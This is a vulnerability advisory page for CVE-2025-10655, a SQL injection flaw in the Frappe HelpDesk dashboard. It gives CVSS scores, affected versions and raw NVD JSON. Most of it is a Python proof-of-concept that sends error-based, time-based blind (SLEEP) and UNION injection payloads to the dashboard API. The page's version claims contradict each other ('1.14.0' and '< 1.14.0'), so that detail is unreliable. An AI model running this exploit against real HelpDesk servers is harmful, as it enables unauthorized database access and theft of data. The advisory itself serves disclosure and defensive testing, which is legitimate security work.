Security Vulnerability Report
中文
CVE-2025-10655 CVSS 8.8 HIGH

CVE-2025-10655

Published: 2025-12-09 16:17:32
Last Modified: 2026-04-14 15:35:01

Description

SQL Injection in Frappe HelpDesk in the dashboard get_dashboard_data due to unsafe concatenation of user-controlled parameters into dynamic SQL statements.This issue affects Frappe HelpDesk: 1.14.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:frappe:helpdesk:1.14.0:*:*:*:*:*:*:* - VULNERABLE
Frappe HelpDesk < 1.14.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10655 SQL Injection PoC for Frappe HelpDesk # Target: Frappe HelpDesk < 1.14.0 # Type: Time-based Blind SQL Injection import requests import time import sys TARGET_URL = "http://target-server/api/v2/tickets/dashboard" def test_sqli_basic(): """Test basic SQL injection with single quote""" headers = { "Content-Type": "application/json", "Authorization": "Bearer <YOUR_TOKEN>" } # Basic test - single quote to trigger SQL error payload = {"filters": "name='test"} try: response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10) if "sql" in response.text.lower() or response.status_code == 500: print("[+] Potential SQL injection detected!") return True except Exception as e: print(f"[-] Error: {e}") return False def extract_db_version(): """Extract database version using time-based blind SQLi""" headers = { "Content-Type": "application/json", "Authorization": "Bearer <YOUR_TOKEN>" } # Time-based blind SQL injection payload for MySQL # Wait for 5 seconds if database version starts with 8 payload = { "filters": f"name' AND (SELECT * FROM (SELECT SLEEP(5))a) AND '1'='1" } start_time = time.time() try: response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=15) elapsed = time.time() - start_time if elapsed >= 5: print("[+] Time-based SQL injection confirmed!") print("[+] Database supports SLEEP function (MySQL/MariaDB)") return True except requests.exceptions.Timeout: print("[+] Request timeout - SQL injection confirmed!") return True except Exception as e: print(f"[-] Error: {e}") return False def union_injection(): """Test UNION-based SQL injection""" headers = { "Content-Type": "application/json", "Authorization": "Bearer <YOUR_TOKEN>" } # UNION injection to extract database name payload = { "filters": "name' UNION SELECT 1,2,3,4,database(),6,7,8,9,10-- -" } try: response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] UNION injection might be possible") print(f"[+] Response preview: {response.text[:500]}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("=" * 50) print("CVE-2025-10655 SQL Injection Test") print("=" * 50) print("\n[1] Testing basic SQL injection...") test_sqli_basic() print("\n[2] Testing time-based blind SQL injection...") extract_db_version() print("\n[3] Testing UNION-based SQL injection...") union_injection() print("\n[!] This PoC is for authorized security testing only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10655", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:31.540", "lastModified": "2026-04-14T15:35:01.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL Injection in Frappe HelpDesk in the dashboard get_dashboard_data due to unsafe concatenation of user-controlled parameters into dynamic SQL statements.This issue affects Frappe HelpDesk: 1.14.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:helpdesk:1.14.0:*:*:*:*:*:*:*", "matchCriteriaId": "5800B62B-FBCA-4D5B-9D72-E81301593FC2"}]}]}], "references": [{"url": "https://fluidattacks.com/advisories/dyango", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/frappe/helpdesk", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/frappe/helpdesk/pull/2795", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}